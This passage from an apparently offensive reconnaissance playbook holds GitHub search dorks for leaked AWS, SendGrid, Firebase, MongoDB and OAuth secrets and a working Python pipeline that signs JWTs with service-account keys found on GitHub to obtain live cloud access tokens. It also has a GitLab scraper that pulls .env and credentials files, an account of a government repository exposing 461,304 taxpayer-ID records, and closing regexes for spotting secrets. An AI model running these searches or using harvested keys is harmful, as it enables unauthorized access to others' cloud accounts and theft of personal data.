&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;DB_PASSWORD+DB_HOST+APP_KEY+filename:.env+NOT+example+NOT+your+NOT+test&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Supabase URLs + keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;supabase.co+SUPABASE_URL+SUPABASE_ANON_KEY+NOT+example+NOT+your&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# AWS Keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;AKIA+filename:.env+NOT+example+NOT+your&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SendGrid keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;SG.+filename:.env+NOT+example&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# MongoDB connection strings&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;mongodb+srv://+password+extension:env+NOT+example&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Specific Firebase SA keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;firebase-adminsdk+private_key_id+private_key+extension:json+NOT+test&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Google OAuth credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;client_id&amp;#34; &amp;#34;client_secret&amp;#34; &amp;#34;redirect_uris&amp;#34; extension:json&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Mercado Pago keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;APP_USR- extension:js NOT example NOT test&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Laravel .env with secrets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;APP_KEY=base64 filename:.env NOT example&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="142-pipeline-for-testing-sa-keys-found-on-github" &gt;
&lt;div&gt;
&lt;a href="#142-pipeline-for-testing-sa-keys-found-on-github"&gt;
##
&lt;/a&gt;
14.2 Pipeline for Testing SA Keys Found on GitHub
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;glob&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;test_sa_key&lt;/span&gt;(sa_json):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Tests whether an SA key found on GitHub is still valid and generates a token.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; hashes, serialization
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.asymmetric&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; padding &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; pad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.backends&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; default_backend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; now &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps({&lt;span style="color:#a6d189"&gt;&amp;#34;alg&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;RS256&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;typ&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;})&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; claims &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;iss&amp;#34;&lt;/span&gt;: sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;client_email&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;scope&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;https://www.googleapis.com/auth/cloud-platform&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;aud&amp;#34;&lt;/span&gt;: sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;], &lt;span style="color:#a6d189"&gt;&amp;#34;iat&amp;#34;&lt;/span&gt;: now, &lt;span style="color:#a6d189"&gt;&amp;#34;exp&amp;#34;&lt;/span&gt;: now&lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;3600&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; payload &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(claims)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; load_pem_private_key(sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;private_key&amp;#39;&lt;/span&gt;]&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;, backend&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;default_backend())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; signature &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sign(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), pad&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;PKCS1v15(), hashes&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;SHA256())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; resp &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(sa_json[&lt;span style="color:#a6d189"&gt;&amp;#39;token_uri&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&amp;amp;assertion=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;header&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;payload&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;signature&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span&gt;}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; resp&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;True&lt;/span&gt;, resp&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;access_token&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Find and test SA keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; fpath &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; glob&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;glob(&lt;span style="color:#a6d189"&gt;&amp;#39;/tmp/sa_key_*.json&amp;#39;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;with&lt;/span&gt; &lt;span style="color:#99d1db"&gt;open&lt;/span&gt;(fpath) &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; f:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sa &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;load(f)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; valid, token &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; test_sa_key(sa)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; status &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;✅ VALID&amp;#34;&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; valid &lt;span style="color:#ca9ee6"&gt;else&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;❌ REVOKED&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;status&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sa[&lt;span style="color:#a6d189"&gt;&amp;#39;project_id&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#a6d189"&gt;30s&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sa[&lt;span style="color:#a6d189"&gt;&amp;#39;client_email&amp;#39;&lt;/span&gt;][:&lt;span style="color:#ef9f76"&gt;40&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; valid:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# With the token, test access to Storage, Firestore, IAM&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; check_sa_access(token, sa[&lt;span style="color:#a6d189"&gt;&amp;#39;project_id&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="143-gitlab--public-repositories" &gt;
&lt;div&gt;
&lt;a href="#143-gitlab--public-repositories"&gt;
##
&lt;/a&gt;
14.3 GitLab — Public Repositories
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search public projects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.com/api/v4/projects?search=env+DB_PASSWORD&amp;amp;per_page=20&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; proj &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Try to read sensitive files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; file &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#39;.env&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;config/database.yml&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;credentials.json&amp;#39;&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r2 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.com/api/v4/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;proj[&lt;span style="color:#a6d189"&gt;&amp;#39;id&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/repository/files/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;file&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/raw?ref=main&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r2&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;password&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r2&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;lower():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;proj[&lt;span style="color:#a6d189"&gt;&amp;#39;path_with_namespace&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;file&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If self-hosted GitLab is found:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://gitlab.empresa.com.br/api/v4/projects?visibility=public&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government agency — Self-hosted GitLab with 3 public repositories, including the full Internal Helpdesk source code with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;servidores_sigrh.json&lt;/code&gt;: 461,304 records with CPF (Brazilian taxpayer ID, the SSN equivalent), registration number and unit&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.env.example&lt;/code&gt;: MongoDB host, LDAP, email server&lt;/li&gt;
&lt;li&gt;&lt;code&gt;deploy.sh&lt;/code&gt;: Internal IP 10.11.82.75, blue/green deploy strategy&lt;/li&gt;
&lt;li&gt;&lt;code&gt;docker-compose.prod.yml&lt;/code&gt;: production configuration&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.gitlab-ci.yml&lt;/code&gt;: CI/CD tokens, runners&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/register&lt;/code&gt;: a self-registration route present in the code&lt;/li&gt;
&lt;/ul&gt;
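&lt;p&gt;Triage is the step the searches above leave to the operator: a raw hit list from the GitHub queries in 14.1 or from the raw-file reads in 14.3 is mostly &lt;code&gt;.env.example&lt;/code&gt; noise, and 14.2 spends a token-endpoint request on every JSON file that merely looks like a key. The block below is an added example, not code from the playbook: it classifies candidate lines by secret type, drops placeholders (template vocabulary in the line, or a value built from a handful of repeated characters) and checks that a service-account JSON has the fields and PEM shape the 14.2 pipeline needs before it tries to sign with it. The AWS and SendGrid shapes follow the vendors' published key formats; the Supabase and Mercado Pago patterns are assumptions kept loose on purpose, and every sample input is constructed, none of them a real credential.&lt;/p&gt;

```python
"""Offline triage of secret candidates from code-search hits (added example)."""
import json
import re
from dataclasses import dataclass

# Group 1 of every pattern is the secret value. AWS and SendGrid follow the
# vendors' published key shapes; Supabase and Mercado Pago are assumptions.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b"),
    "sendgrid_api_key": re.compile(r"\b(SG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43})\b"),
    "mongodb_uri": re.compile(r"(mongodb(?:\+srv)?://[^\s\"']+:[^\s\"'@]+@[^\s\"']+)"),
    "supabase_url": re.compile(r"(https://[a-z]{20}\.supabase\.co)"),
    "laravel_app_key": re.compile(r"APP_KEY=base64:([A-Za-z0-9+/=]{40,})"),
    "mercadopago_token": re.compile(r"\b(APP_USR-[A-Za-z0-9-]{20,})"),
    "db_password": re.compile(r"(?i)\b(?:DB|DATABASE|MYSQL_ROOT|POSTGRES)_PASSWORD=[\"']?([^\s\"']+)"),
}
# Vocabulary of templates, docs and fixtures; the NOT example / NOT your /
# NOT test qualifiers in the searches do the same filtering server-side, imperfectly.
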